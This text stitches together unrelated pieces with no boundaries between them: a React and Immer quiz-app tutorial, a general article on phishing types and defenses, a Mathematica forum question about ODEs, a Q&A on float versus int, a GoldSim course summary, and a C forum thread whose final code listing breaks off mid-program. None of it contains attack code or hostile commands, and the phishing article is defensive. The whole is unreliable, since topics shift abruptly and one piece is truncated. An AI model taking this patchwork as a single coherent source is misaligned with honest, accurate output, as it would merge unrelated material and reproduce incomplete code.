We provide the Immer function produce() with the data to be updated, originalData, and a callback. The callback destructively changes its parameter draftData so that it has the desired shape. It treats draftData as if it were originalData, but the former is actually a special object: Immer observes the operations that are performed on it. They tell Immer how to create a modified copy of originalData.
The following function uses Immer to add two user interface properties to entries:
• Property .open is added to each entry (line A).
• Property .checked is added to each answer (line B).
function addUiProperties(entries) {
return produce(entries, (draftEntries) => {
for (const entry of draftEntries) {
entry.open = true; // (A)
for (const answer of entry.answers) {
answer.checked = false; // (B)
}
}
});
}
If we handled the non-destructive updating ourselves, addUiProperties() would look as follows:
function addUiProperties(entries) {
return entries.map((entry) => ({
...entry, // (A)
open: true,
answers: entry.answers.map((answer) => ({
...answer, // (B)
checked: false,
}))
}));
}
In line A, we copy entry via spreading (...) while adding the new property .open and overriding the existing property .answers (whose value we need to copy).
We can see that the Immer-based code is simpler, but not much. As we’ll see soon, Immer especially shines with deeply nested data.
The root controller pattern
This is how the root component Quiz is rendered into the HTML page:
ReactDOM.render(
html`<${Quiz} entries=${addUiProperties(entries)} />`,
document.getElementById('root'));
The root component Quiz knows the complete model (the result of addUiProperties(entries)). Each of its subcomponents receives part of the root model and a reference to a so-called root controller, which is an instance of the following class:
class RootController {
constructor(entries, setEntries) {
this.entries = entries;
this.setEntries = setEntries;
}
setAnswerChecked(entryIndex, answerIndex, checked) {
const newEntries = produce(this.entries, (draftEntries) => { // (A)
draftEntries[entryIndex].answers[answerIndex].checked = checked;
});
this.setEntries(newEntries); // refresh user interface
}
closeEntry(entryIndex) {
const newEntries = produce(this.entries, (draftEntries) => { // (B)
draftEntries[entryIndex].open = false;
});
this.setEntries(newEntries); // refresh user interface
}
}
Whenever a user interaction happens in one of the subcomponents of Quiz, that subcomponent asks the root controller to change the root model accordingly. After the change, the root controller calls this.setEntries (which originally was created via the useState() hook) and the whole user interface is recreated.
The root controller having access to the whole model has one considerable benefit: It’s easy to manage cross-component changes.
In line A and line B, we used Immer to non-destructively update this.entries. This time, the code is much simpler than without Immer.
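For comparison, here is a hand-written sketch of the same non-destructive update as in line A, without Immer (one way to do it, not code from the post):
setAnswerChecked(entryIndex, answerIndex, checked) {
  const newEntries = this.entries.map((entry, ei) =>
    ei !== entryIndex
      ? entry
      : {
          ...entry, // copy the entry
          answers: entry.answers.map((answer, ai) =>
            ai !== answerIndex
              ? answer
              : {...answer, checked}), // override .checked
        });
  this.setEntries(newEntries); // refresh user interface
}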
I call the pattern of passing a root controller object to all user interface components the root controller pattern.
The user interface components
The root component Quiz
This is the implementation of the root component:
function Quiz({entries: initialEntries}) {
const [entries, setEntries] = useState(initialEntries);
const root = new RootController(entries, setEntries);
return html`
<${React.Fragment}> <!--(A)-->
<h1>Quiz</h1>
<${AllEntries} root=${root} entries=${entries} />
<hr />
<${Summary} entries=${entries} />
<//>
`;
}
A React component must return valid virtual DOM data. Valid data is:
• A single virtual DOM element
• A boolean, a number, or a string
• null (which produces zero output)
• An Array where each element is valid virtual DOM data
In line A, we use the special component React.Fragment to return multiple elements. This works better than an Array because conceptually, Array elements tend to be similar in nature and produced via iteration. And with an Array, we would have to specify key attributes.
Quiz has two subcomponents: AllEntries and Summary.
The component AllEntries
Each quiz entry is initially open – the user can check and uncheck answers as desired. Once they submit the answers they think are correct, the entry is closed. Now they can’t change the selected answers anymore and the quiz app lets them know if they got their answers right or not.
function AllEntries({root, entries}) {
return entries.map((entry, index) => {
const entryKind = entry.open ? OpenEntry : ClosedEntry;
return html`
<${entryKind} key=${index} root=${root} entryIndex=${index} entry=${entry} />`
});
}
The component OpenEntry
The component OpenEntry displays entries that are open:
function OpenEntry({root, entryIndex, entry}) {
return html`
<div>
<h2>${entry.question}</h2>
${
entry.answers.map((answer, index) => html`
<${OpenAnswer} key=${index} root=${root}
entryIndex=${entryIndex} answerIndex=${index} answer=${answer} />
`)
}
<p><button onClick=${handleClick}>Submit answers</button></p> <!--(A)-->
</div>`;
function handleClick(event) {
event.preventDefault();
root.closeEntry(entryIndex);
}
}
function OpenAnswer({root, entryIndex, answerIndex, answer}) {
return html`
<div>
<label>
<input type="checkbox" checked=${answer.checked} onChange=${handleChange} />
${' ' + answer.text}
</label>
</div>
`;
function handleChange(_event) { // (B)
// Toggle the checkbox
root.setAnswerChecked(entryIndex, answerIndex, !answer.checked);
}
}
With an open entry, we can submit our answers via a button (line A). Note how the click handler handleClick() uses the root controller instance in root to change the model and to refresh the user interface.
We also refresh the complete user interface whenever the user changes a checkbox (line B).
The component ClosedEntry
The component ClosedEntry displays entries that are closed:
function ClosedEntry({root, entryIndex, entry}) {
return html`
<div>
<h2>${entry.question}</h2>
${
entry.answers.map((answer, index) => html`
<${ClosedAnswer} key=${index} root=${root} entryIndex=${entryIndex} answer=${answer} answerIndex=${index} />
`)
}
${
areAnswersCorrect(entry) // (A)
? html`<p><b>Correct!</b></p>`
: html`<p><b>Wrong!</b></p>`
}
</div>`;
}
function ClosedAnswer({root, entryIndex, answerIndex, answer}) {
const style = answer.correct ? {backgroundColor: 'lightgreen'} : {};
return html`
<div>
<label style=${style}>
<input type="checkbox" checked=${answer.checked} disabled /> <!--(B)-->
${' ' + answer.text}
</label>
</div>
`;
}
This time, all answers are disabled – we can’t check or uncheck them anymore (line B).
We give the user feedback if they got their answers right (line A).
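The helper areAnswersCorrect() is not quoted in the post either. Judging from how the quiz behaves, a plausible sketch (my assumption about its logic) is that an entry counts as correct exactly when every checkbox matches the answer’s .correct flag:
function areAnswersCorrect(entry) {
  // Every correct answer must be checked, every wrong answer unchecked.
  return entry.answers.every(
    (answer) => answer.checked === answer.correct);
}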
The component Summary
Component Summary() is shown at the end of the quiz:
function Summary({entries}) {
const numberOfClosedEntries = entries.reduce(
(acc, entry) => acc + (entry.open ? 0 : 1), 0);
const numberOfCorrectEntries = entries.reduce(
(acc, entry) => acc + (!entry.open && areAnswersCorrect(entry) ? 1 : 0), 0);
return html`
Correct: ${numberOfCorrectEntries} of ${numberOfClosedEntries}
${numberOfClosedEntries === 1 ? ' entry' : ' entries'} <!--(A)-->
`;
}
In line A, we once again have to account for the JSX whitespace rules: In order for the number after “of” to be separated from the word “entry” or “entries”, we have to insert a space before the latter.
This component summarizes:
• numberOfClosedEntries: How many entries have we answered already?
• numberOfCorrectEntries: How many entries did we answer correctly?
Exercises
• Use the browser function fetch() to load a JSON file with the quiz data.
• You can put that JSON file in the html/ directory.
• You will invoke fetch() first and render Quiz after you have received the JSON data.
• Change RootController so that it doesn’t use the Immer library. That should make it obvious how useful that library is.
How does Snowpack work?
Snowpack is configured via the file snowpack.config.json. Its contents are (with one minor setting omitted):
{
"mount": {
"html": "/",
"js": "/js"
}
}
Apart from the dependencies that we have stated in package.json, that is all the configuration data that Snowpack needs: mount states which directories contain data that Snowpack should serve or build.
Snowpack serves and builds three kinds of data:
• The mounted directories
• Directory __snowpack__/ with Snowpack-related metadata (which can be used in advanced building scenarios)
• Directory web_modules/:
• After an npm install, directory node_modules/ contains all dependencies mentioned in package.json. There are usually multiple files per package and some of them may be in the CommonJS module format which browsers don’t support natively.
• Snowpack examines the JavaScript code in the mounted directories. Whenever one of the dependencies is mentioned, it compiles the package in node_modules/ into browser-compatible code in web_modules/. Often the latter is a single file.
Additionally, Snowpack slightly changes the imports in mounted JavaScript files.
// Imports in a JavaScript file:
import ReactDOM from 'react-dom';
import {useState} from 'react';
// Output generated by Snowpack:
import ReactDOM from '/web_modules/react-dom.js';
import {useState} from '/web_modules/react.js';
Other than the imports, Snowpack doesn’t change anything in JavaScript files (during development time, when using the server).
Building
Building is performed via the following command:
npm run build
Snowpack writes the complete web app into the directory minimal-react/build (including web_modules/ etc.). This version of the app works without the Snowpack development server and can be deployed online.
Conclusion
State management via the root controller pattern
I’ve used the root controller pattern in several of my React applications and I got surprisingly far without needing a more advanced state management solution.
If you don’t want to pass the root controller explicitly, you can take a look at the useContext hook.
Next steps
The React ecosystem consists of a small core (the library itself) that is complemented by many external add-ons. That has an upside and a downside:
• Upside: It’s relatively easy to learn the core. The add-ons are all optional.
• Downside: There is a lot of choice w.r.t. the add-ons, which can result in serious analysis paralysis.
There are two good options for getting started:
• Start small, e.g. with the setup shown in this blog post. Only add more libraries if you really need them – each one increases the weight of the project.
• The React team has created a “batteries included” application setup called create-react-app. That’s a good starting point if you want more functionality from the get-go.
Learning more about the React ecosystem
• If you want to read more about the React ecosystem, there are many guides available online. For example, “React Libraries in 2020” by Robin Wieruch.
• You can also use React to develop native applications: React Native is also based on a virtual DOM. But in this case, it is used to render native user interfaces. This is a compelling proposition, especially for cross-platform applications.
Phishing Attack Examples and How to Prevent Them
Phishing is arguably the most successful cyber-attack method on the planet. Cybercriminals love to phish people because phishing works. Phishing is a type of social engineering that manipulates employees and individuals into performing actions that benefit a cybercriminal. There have been many research studies into the success rate of phishing; the statistics vary, but they all agree that it is the most utilized method to begin a cyber-attack against an organization. The latest research from Symantec shows that 96% of data breaches start with a phishing email; 1 in 4,200 emails during 2020 was a phishing email. Further research from Verizon's 2021 Data Breach Investigations Report shows an upward trend in phishing-related cyberattacks.
Phishing is successful and damaging; the results can include ransomware, a Business Email Compromise (BEC) scam, a data breach, identity theft, and so on. Therefore, it is vital to understand the different types of phishing and the types of cyber-attacks associated with them. Both organizations and managed service providers (MSPs) can use this know-how to understand better how to prevent phishing attacks.
Six Phishing Attack Examples
Email Phishing
This is the most common form of phishing and one that most of us have come across. This type of phishing uses a spray gun approach to phishing. Cybercriminals indiscriminately send out phishing emails to any email address at their disposal. Scammers can quickly obtain thousands of email addresses by harvesting or from email addresses stolen in data breach incidents. Phishing emails contain links to a malicious website or an infected attachment.
What Happens in Email Phishing Campaigns?
Phishing emails are regular occurrences in both private and corporate email inboxes. These phishing emails often impersonate known commercial brands such as PayPal, Apple, and Facebook. These emails will use an individual's trust in that brand to manipulate their behavior. Phishing emails use tactics such as fear of hacking, urgency, or fear of missing out (FOMO) to encourage an email recipient to click on a malicious link or download an infected attachment.
[Image: example of an AppleID phishing email]
Email phishing can lead to malware infection via an infected attachment in the email. If the recipient clicks on the attachment, the malware will look for vulnerabilities in software on the user's device and exploit these flaws to install the malicious software.
Email phishing can lead to stolen login credentials via an associated spoof website; a user is taken to this site if they click on a link in the email or an attachment.
Phishing emails are increasingly challenging to detect because they are designed to evade detection by end users. For example, infected attachments such as Word and Excel documents are now less common; instead, fake image files (.jpeg and .png) are increasingly used to bring malware into people's inboxes.
Spear-phishing
Spear-phishing is a targeted form of email phishing. An Avanti report found some worrying results when investigating changes in phishing volumes. The researchers found that 85% of respondents spoke of "increasing sophistication" in phishing campaigns. Email phishing works, but spear-phishing takes phishing to new levels of success. Phishers take advantage of a lack of IT skills in an organization to exploit a stressed and tired workforce. If a scammer can get the keys to the castle (login credentials to corporate networks/apps), they can make a lot of money and cause damage. Spear-phishing targets those in an organization who have access to sensitive corporate resources, such as system administrators, C-level executives, and those working in accounts payable. Spear-phishing emails work in the same way as general phishing emails, using psychological tactics to manipulate the behavior of their target.
What Happens in a Spear-Phishing Campaign?
A scammer will typically carry out reconnaissance research into a company. This helps them locate a likely target, such as a system administrator, whose privilege level can give the scammer access to sensitive resources. The scammer will then compose a realistic-looking email that may spoof a corporate app, such as a Microsoft Office 365 request to download a vital company document. If the target employee clicks on the malicious link and enters their login credentials or other revealing data into an associated spoof website, the scammer will use this to carry out the next stage in the attack, e.g., infect the network with ransomware.
Whaling
When spear-phishing scammers go after C-level executives, the phishing attack is known as 'whaling,' aka, catching the big one, a 'whale'. In whaling attacks, scammers will carry out deep reconnaissance of a company, building up the profile of a C-Level executive, such as a CEO or CFO. The resultant spear-phishing email will use extreme tactics and behavioral motivators, such as fear, to manipulate the executive's behavior. For example, the phishing email may contain a threat that the company will be sued to encourage the executive to click on a link or open an infected attachment.
What Happens in a Whaling Attack?
Business Email Compromise (BEC) often has an element of whaling involved. Large and small firms are both at risk of whaling, as this NPR interview with a small business owner discussed: "Mark," an owner of a real-estate firm, told the show how he became a victim of a targeted account takeover attack. Whaling attacks typically try to trick an executive into transferring money directly, or into passing approval for a transfer of funds to an accounts payable employee.
Vishing
Vishing is a form of phishing that uses a mobile phone to extract information from an individual or direct them to carry out a behavior that results in stolen data. Often vishing is used in combination with other phishing types, such as spear-phishing. Whaling, for example, may involve an initial phone call from a scammer to extract information that then leads to a whaling email. Vishing covers a spectrum of sophistication, from spray gun-type vishing messages that target the public to focused spear-vishing. The latter may work as part of a scam that steals large sums of money from a business. An excellent example of this was a 2018 scam that involved a phone call that used a fake voice to trick a CEO into transferring $240,000 to a fraudster.
What Happens in A Vishing Attack?
A recent FBI notice explains how scams may use multiple steps during a cyber-attack, some of these steps focusing on privileged users. These attacks often involve reconnaissance using vishing that then utilizes spoof web pages that are used to steal second-factor authentication codes, thereby bypassing traditional forms of protection.
Smishing
Smishing is a form of phishing that uses mobile messaging channels, such as SMS text and WhatsApp, etc., to send out a phishing message. Like its email counterpart, the smishing message uses psychological tricks to manipulate targets.
What Happens in A Smishing Attack?
Like all social engineering attacks, smishing uses tricks to manipulate users into doing as the scammer wants. The fraudster uses tricks such as instilling fear into the recipient of a phishing message: financial smishing is a form of smishing where the message will look like it is from a well-known bank. The message will be composed to scare the recipient into thinking their bank account is compromised. The smishing message typically contains a URL that will take the person to a fake bank website where their actual bank login credentials will be stolen, and their bank account hacked.
Fake Websites
Many phishing campaigns depend on fake websites to carry out an attack, so it is essential to note the part that spoof websites play in email phishing attacks. Fake or spoof websites are typically sophisticated and realistic, using domain names similar to the brand they spoof. In addition, the sites usually use digital certificates to make the website look 'secure': the certificate lets the site URL begin with HTTPS (the S stands for secure). The Anti-Phishing Working Group (APWG) identified 316,747 such websites in December 2021.
What Happens if a User Navigates to a Spoof Website?
The spoof website is often a companion to a phishing campaign. A malicious link in a phishing, spear-phishing, or smishing message, will take a recipient to the companion spoof website. The fake webpage usually reflects the brand that the phishing message spoofs, for example, a Microsoft Office 365 login page. Once the target has navigated to the spoof website, they are requested to enter their login credentials (or other personal details). Once submitted, the data is sent to the hacker behind the scam, who then uses them to log in to the actual site.
Ways to Stop Phishing in all its Forms
Protection against phishing requires a layered approach to anti-phishing protection; by using multiple layers of protection, an organization is more likely to stop the threat before it becomes an incident:
Educate Your Employees
This is a fundamental step in phishing prevention. Security awareness training, augmented with simulated phishing exercises, will make employees aware of the various phishing attack methods.
Choose a Phishing Prevention Platform that is Easily Deployed and Maintained
Effective phishing prevention needs to be scalable across multiple types of devices. The email and content filters must be easy to configure and update from a central console. A cloud-based system provides central management and is well suited to deployment and management by a managed service provider (MSP).
Student Support Forum: "Failed solving ODE system" (General > Archives)
Aleksei
11/25/09 04:04am
Hello All,
While using Mathematica I ran into a problem solving a system of ODEs. Maybe this problem is not technical but mathematical in character.
As a first step I needed to solve this system (kinetic equations for isotopic exchange):
/parameters calculated from the experimental conditions/
K1=0.107
K2=0.541
K3=0.844
α0=0.981
αs0=0.0024
result := DSolve[{α'[t] == (α0 - α[t])*K1 + (αs[t] - α[t])*K2, αs'[t] == (α[t] - αs[t])*K3, α[0] == αs0, αs[0] == αs0}, {α[t], αs[t]}, t]
α00[t_] = α0[t]/.result
It has an analytical solution (a sum of exponentials), and α00[t] behaves like a function of the form f(t) = 1 - p*exp(-qt), 0 < p < 1, q > 0 on the interval {0, +inf}. I also found a numerical solution using the NDSolve procedure; the interpolating function on the required interval {0, 100} looked the same as the analytical one.
Then I needed to solve the similar system:
result := NDSolve[{α'[t] == (α00[t] - α[t])*K1 + (αs[t] - α[t])*K2, αs'[t] == (α[t] - αs[t])*K3, α[0] == αs0, αs[0] == αs0}, {α[t], αs[t]}, {t,0,100}]
The difference from the first system is contained in replacing of the constant "α0" by the function "α00[t]", which is a solution of the first system.
The solution of the second system must look like the aforementioned exponential (I know because I saw the solution in another software environment), but the output says "The derivative is not consistent with initial conditions" or something like that, and I cannot plot the α00[t] curve. I don't know what is wrong; I'm not an expert in math. I tried to supply α00[t] as both the analytical and the numerical solution, but the result was the same.
I looked in the Help, but didn't find a solution for my case.
Could you give me your suggestions on how to solve this system? Maybe I need to change some parameters?
I work in Mathematica 5.2 for students.
Thank you for your advice in advance!
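One common cause of this error is that α00 is defined through a replacement rule on a := definition, so it is not a plain function of t by the time NDSolve evaluates the equations (and := makes the solver re-run on every use). A sketch of a possible fix, assuming standard NDSolve behavior (variable names changed to plain ASCII), is to solve the first system numerically once with =, extract the interpolating function, and feed that into the second system:

K1 = 0.107; K2 = 0.541; K3 = 0.844; a0 = 0.981; as0 = 0.0024;

(* First system: solve once and keep the interpolating functions *)
sol1 = First[NDSolve[
    {a'[t] == (a0 - a[t]) K1 + (as[t] - a[t]) K2,
     as'[t] == (a[t] - as[t]) K3,
     a[0] == as0, as[0] == as0},
    {a, as}, {t, 0, 100}]];
a00 = a /. sol1;  (* a00[t] is now an InterpolatingFunction valid on 0 <= t <= 100 *)

(* Second system: the constant a0 is replaced by the function a00[t] *)
sol2 = First[NDSolve[
    {b'[t] == (a00[t] - b[t]) K1 + (bs[t] - b[t]) K2,
     bs'[t] == (b[t] - bs[t]) K3,
     b[0] == as0, bs[0] == as0},
    {b, bs}, {t, 0, 100}]];

Plot[Evaluate[{b[t], bs[t]} /. sol2], {t, 0, 100}]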
What is the difference between the float and integer data types when their size is the same?
• I think you mean float and int. The classes Float and Integer are wrappers for these. They are also the same size. ;) – Peter Lawrey Jan 26 '11 at 17:22
• float stores floating-point values, that is, values that have potential decimal places
• int only stores integral values, that is, whole numbers
So while both are 32 bits wide, their use (and representation) is quite different. You cannot store 3.141 in an integer, but you can in a float.
Dissecting them both a little further:
In an integer, all bits are used to store the number value. This is (in Java and many computers too) done in the so-called two's complement. This basically means that you can represent the values of −2^31 to 2^31 − 1.
In a float, those 32 bits are divided between three distinct parts: The sign bit, the exponent and the mantissa. They are laid out as follows:
S EEEEEEEE MMMMMMMMMMMMMMMMMMMMMMM
There is a single bit that determines whether the number is negative or non-negative (zero is neither positive nor negative, but has the sign bit set to zero). Then there are eight bits of an exponent and 23 bits of mantissa. To get a useful number from that, (roughly) the following calculation is performed:
M × 2^E
(There is more to it, but this should suffice for the purpose of this discussion)
The mantissa is in essence not much more than a 24-bit integer number. This gets multiplied by 2 to the power of the exponent part, which, roughly, is a number between −128 and 127.
Therefore you can accurately represent all numbers that would fit in a 24-bit integer but the numeric range is also much greater as larger exponents allow for larger values. For example, the maximum value for a float is around 3.4 × 10^38 whereas int only allows values up to 2.1 × 10^9.
But that also means, since 32 bits only have 4.2 × 10^9 different states (which are all used to represent the values int can store), that at the larger end of float's numeric range the numbers are spaced wider apart (since there cannot be more unique float numbers than there are unique int numbers). You cannot represent some numbers exactly, then. For example, the number 2 × 10^12 has a representation in float of 1,999,999,991,808. That might be close to 2,000,000,000,000 but it's not exact. Likewise, adding 1 to that number does not change it because 1 is too small to make a difference in the larger scales float is using there.
Similarly, you can also represent very small numbers (between 0 and 1) in a float but regardless of whether the numbers are very large or very small, float only has a precision of around 6 or 7 decimal digits. If you have large numbers those digits are at the start of the number (e.g. 4.51534 × 10^35, which is nothing more than 451534 followed by 30 zeroes – and float cannot tell anything useful about whether those 30 digits are actually zeroes or something else), for very small numbers (e.g. 3.14159 × 10^−27) they are at the far end of the number, way beyond the starting digits of 0.0000...
• It's worth noting that even though the two datatypes have the same size (32-bit), the bit pattern used to represent the same number in the two datatypes is vastly different. E.g. the bit pattern for the unsigned integer 1 is 00....001, while the bit pattern for the floating-point 1.0 would be something else entirely. – Sasha Goldshtein Jan 26 '11 at 16:23
• @Sasha: Still typing ;) – Joey Jan 26 '11 at 16:25
• A subtle point is that floating point numbers do not actually support decimal places. Instead of a decimal point, they have a radix point. In all practical cases, the radix is 2. (Decimal floats have been standardized by IEEE, but are not in wide use.) This distinction can be important, especially in applications that are sensitive to rounding, like financial apps. – Kevin A. Naudé Jan 26 '11 at 17:03
• @Kevin: Indeed. I kept this answer very shallow, though, since I think if someone doesn't even know the difference between FP and integral types there is a lot of explaining still to do. But yes, you pretty much never want floating-point numbers to get near monetary values. – Joey Jan 26 '11 at 17:21
• @Ammaro: The mantissa has an implied first bit of 1. Which means that it's actually 24 bits long, even though only 23 are contained in the data structure. – Joey Jan 26 '15 at 13:57
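A short, self-contained Java sketch (the values are hypothetical, chosen to match the numbers discussed in the answer above) demonstrating both effects:

public class FloatVsInt {
    public static void main(String[] args) {
        // 2^24 + 1 = 16,777,217 does not fit in float's 24-bit mantissa:
        int i = 16_777_217;
        float f = i;
        System.out.println((int) f);        // prints 16777216: the round trip loses 1

        // Near 2e12 the gap between adjacent floats is 2^17 = 131072:
        float big = 2e12f;
        System.out.printf("%.0f%n", big);   // prints 1999999991808
        System.out.println(big + 1 == big); // prints true: 1 is smaller than the gap
    }
}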
Floats are used to store a wider range of numbers than can fit in an integer. These include decimal numbers and scientific-notation-style numbers that can be bigger than anything that fits in 32 bits. Here's the deep dive into them: http://en.wikipedia.org/wiki/Floating_point
• Strictly speaking, you should say 32 bits... 2^32 is the number of values that can be represented with 32 bits. 2^32 bits would be ~4 gigabits (or 4 gibibits)... and you can surely represent larger values with that than you can with a single precision float. – Luke Jun 20 '13 at 14:25
Courses: Introduction to GoldSim:
Unit 7 - Modeling Material Flows
Lesson 14 - Unit 7 Summary
In this Unit, we discussed how to track the movement or changes in tangible things (such as water, widgets or people). When tangible things move through or change within a system, the dynamics can actually be conceptualized in two different ways: continuously or discretely. Things that move continuously can be thought of as flowing. An example of this is the movement of water. Other things move or happen discretely (e.g., such that they must be tracked individually). Examples of this include financial transactions or the movement of parts through a factory. Most real-world systems are best described using a combination of continuous and discrete dynamics. In this Unit, however, we focused on representing continuous dynamics. A later Unit will focus entirely on GoldSim’s capabilities for representing discrete dynamics.
The key points that we covered were as follows:
• Many elements in GoldSim actually have multiple outputs. The Reservoir is one such element. The output with the same name as the element is referred to as the primary output. Other outputs are referred to as secondary outputs.
• Not all elements, however, have a primary output. A primary output represents the key output (i.e., the output that you are likely most interested in). For some elements, all the outputs are secondary outputs.
• When we write expressions or reference another element name in an input field, we are not really referencing the name of the element at all; we are referencing the name of the element’s primary output.
• To reference a secondary output, you need to reference both the element name and the output name as follows: ElementID.OutputID.
• If you specify an Upper Bound for a Reservoir, it adds two secondary outputs: 1) The Overflow_Rate outputs the rate the Reservoir is overflowing (and is zero unless the Reservoir is at its Upper Bound); 2) The Is_Full output is a condition. It is True when the Reservoir is at the Upper Bound, and False otherwise. (A minimal code sketch of this behavior appears after this list.)
• GoldSim steps through time in discrete intervals referred to as timesteps. Calculations (referred to as updates of the model) are carried out at the end of every timestep. In GoldSim, there are actually two kinds of updates/timesteps: scheduled updates and unscheduled updates.
• Scheduled updates are specified directly prior to running the model. That is, you tell GoldSim when you want these updates to occur. In some cases, however, certain events may occur between scheduled updates of the model, and waiting for the next scheduled update could decrease the accuracy of the simulation. Such events trigger what is referred to as an unscheduled update of the model. Unscheduled updates are timesteps that are dynamically inserted by GoldSim during the simulation in order to more accurately simulate the system.
• One of the most common events which can trigger an unscheduled update is a Reservoir hitting an Upper or Lower Bound.
• A key and important difference between scheduled updates and unscheduled updates is that scheduled updates are included in time history plots and tables (unless you specifically choose to exclude some by skipping them). Unscheduled updates, however, do not appear in time history plots and tables. That is, although these timesteps may affect the results (e.g., by making them more accurate at the scheduled timesteps), unscheduled updates of the model are not saved or plotted. Only the scheduled updates are actually saved and plotted.
• Due to the possible presence of unscheduled updates, you should keep two things in mind: 1) You should never assume that the timestep length is constant. It might actually change (shorten) during the simulation (due to unscheduled updates that you are unaware of); and 2) the value of an output reported at a particular time represents the instantaneous value at that point in time, and does not represent the average value over the previous timestep.
• Reservoirs have an output named “Withdrawal_Rate”. This is not the same as the Withdrawal Rate input. The Withdrawal Rate input is what you wish to withdraw from the Reservoir (it is a demand or a request). The “Withdrawal_Rate” output is what is actually withdrawn from the Reservoir (which may be less than the request). In particular, if the Reservoir is above its Lower Bound, the “Withdrawal_Rate” output is identical to the Withdrawal Rate input. However, if the Reservoir is at its Lower Bound, the “Withdrawal_Rate” output may be less than the Withdrawal Rate input.
• When simulating the flow of materials (such as water or money or people) through a system, it is almost always necessary to split a flow at a particular point and redirect it to multiple destinations. Because this is so common, GoldSim has a specialized element to facilitate this named a Splitter.
• In some situations, however, it is not possible to simply specify how a signal (a flow) is split. Instead, there may be multiple competing “demands” on that flow and the total demand may exceed what is available. In such a case, the flow must be allocated between those demands, based on priority. GoldSim provides a specialized element to facilitate this named an Allocator.
• It is also common to need to sum a number of flows. The Sum element provides an easy and clear way to add together any number of flows (or other types of variables).
• Although Reservoirs are useful for simple models (and some specialized applications), correctly modeling multiple withdrawals from a Reservoir can be complex (and require additional logic). As a result, GoldSim provides a more powerful version of a Reservoir called a Pool. A Pool combines the features of a Sum, an Allocator and a Reservoir into a single element. It is particularly powerful at allocating and routing multiple (and potentially competing) outflows. In most real-world cases you will want to use Pool elements whenever modeling material flows.
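GoldSim itself is a graphical tool, but the bounded Reservoir behavior summarized above can be sketched in a few lines of Python. This is an illustrative toy model only; the names mirror the outputs discussed in this Unit and are not GoldSim's actual API:

class Reservoir:
    def __init__(self, initial=0.0, lower_bound=0.0, upper_bound=float("inf")):
        self.value = initial
        self.lower = lower_bound
        self.upper = upper_bound

    def update(self, inflow_rate, withdrawal_request, dt):
        """One timestep; returns (overflow_rate, actual_withdrawal_rate)."""
        # The delivered withdrawal may be less than the request if honoring
        # it would push the Reservoir below its Lower Bound.
        available_rate = (self.value - self.lower) / dt + inflow_rate
        withdrawal_rate = min(withdrawal_request, max(available_rate, 0.0))

        self.value += (inflow_rate - withdrawal_rate) * dt

        # Anything above the Upper Bound leaves immediately as overflow.
        overflow_rate = max(self.value - self.upper, 0.0) / dt
        self.value = min(self.value, self.upper)
        return overflow_rate, withdrawal_rate

    @property
    def is_full(self):
        return self.value >= self.upper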
Now that you understand the fundamentals of modeling material flows, we can start to explore how to represent some of the complex dynamics that often occur in such systems, such as feedback loops and delays. We will start to do that in the next Unit.
#1: Registered User (Devshed Newbie, joined Oct 2012)
Unexplained program crash
Learning C and having an issue with a very simple program. I have changed the declarations of numbers that should be float to int and it has not had an effect. It is probably a very stupid error or maybe a compiler issue. Thoughts?
Code:
#include <stdio.h>
#include <stdlib.h>
int main()
{
char name[10];
int wage=0;
int hrs=0;
const float tax_rate= 1.13;
float pay=0;
// Insert Header
printf("**************************************************\n");
printf("**************************************************\n");
printf("** **\n");
printf("** **\n");
printf("** Employee Pay Calculator **\n");
printf("** **\n");
printf("** **\n");
printf("**************************************************\n");
printf("**************************************************\n\n\n\n");
// Get employee name, hourly pay, hours worked
// then compute the pay and return the value
printf("Enter employee's name: \n");
scanf("%s", name);
printf("Enter hours %s worked this pay period: \n", name);
scanf("%i", hrs);
printf("Enter %s pay rate: \n", name);
scanf("%i", wage);
pay = wage * hrs;
pay = pay / tax_rate;
printf("\n%s, pay is: %f, this pay period. \n", name, pay);
system("PAUSE");
return 0;
}
#2: Anemic Moderator (Devshed Supreme Being, Washington, USA, joined Mar 2007)
Code:
char name[10];
1. Are you entering names that are no more than 9 characters long? That's all your array allows for (because that 10 has to include the \0).
Code:
scanf("%i", hrs);
scanf("%i", wage);
2. scanf() needs the memory address of where to store the stuff it reads in; the variable itself is not enough. Use a & to get their addresses, like
Code:
scanf("%i", &hrs);
scanf("%i", &wage);
If you're wondering, since name is an array it's already an address. On the other hand name[0] is not an address so if you passed that you'd have to use a & (which would be weird because it's easier to just pass name by itself).
#3: Registered User (Devshed Newbie, joined Oct 2012)
I made the name array small to only allow for the first name; I have changed it to [25] characters now. I also added the address-of operator (&) to the variables. However, the math portion is still not giving what I am expecting. The response is either 0, a huge number, or a hex number, rather than the value of pay = (wage * hrs) / tax_rate;
#4: Contributing User (Devshed Newbie, joined Oct 2012)
Originally Posted by astonecipher
I did the name array to only allow for the first name, I changed it to [25] characters now. I also added the pointers (&) in the variables. However the math portion is still not giving what I am expecting. The response is either 0, a gig number, or a hex number without giving the value of pay=(wage * hrs) / tax_rate;
Try casting one of these to float...Like below
Code:
pay = (float)wage * hrs;
#5: Registered User (Devshed Newbie, joined Oct 2012)
Originally Posted by G4143
Try casting one of these to float...Like below
Code:
pay = (float)wage * hrs;
Not doing anything different. It is at least no longer crashing.
This is the current code I am testing with revision.
Code:
#include <stdio.h>
#include <stdlib.h>
int main()
{
char name[25];
float wage;
float hrs;
float tax_rate =1.13;
float pay;
// Insert Header
printf("**************************************************\n");
printf("**************************************************\n");
printf("** **\n");
printf("** **\n");
printf("** Employee Pay Calculator **\n");
printf("** **\n");
printf("** **\n");
printf("**************************************************\n");
printf("**************************************************\n\n\n\n");
/*Get employee name, hourly pay, hours worked
then compute the net pay and return the value
*/
printf("Enter employee's first name: \n");
scanf("%s", name);
printf("Enter hours %s worked this pay period: \n", name);
scanf("%f", &hrs);
printf("Enter %s pay rate: \n", name);
scanf("%.2f", &wage);
pay = (float)wage * hrs;
// pay = pay / tax_rate; expelled for testing
printf("\n%s's, pay is: $%2.f, this pay period. \n", name, pay);
system("PAUSE");
return 0;
}
#6: Registered User (Devshed Newbie, joined Oct 2012)
Working properly
Okay, the casting did help. I initialized all of my variables to 0, then recompiled and it is now giving expected values. Thank you.
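For completeness, here is a cleaned-up sketch of the final program. Two details worth noting beyond the fixes discussed in the thread: a precision such as "%.2f" is not valid in a scanf format string (precision belongs to printf), and the specifier %2.f in the last listing prints zero decimal places, where %.2f was almost certainly intended:

Code:
#include <stdio.h>

int main(void)
{
    char name[25];
    float wage = 0.0f;
    float hrs = 0.0f;
    const float tax_rate = 1.13f;
    float pay = 0.0f;

    printf("Enter employee's first name:\n");
    scanf("%24s", name);                /* width limit prevents buffer overflow */

    printf("Enter hours %s worked this pay period:\n", name);
    scanf("%f", &hrs);

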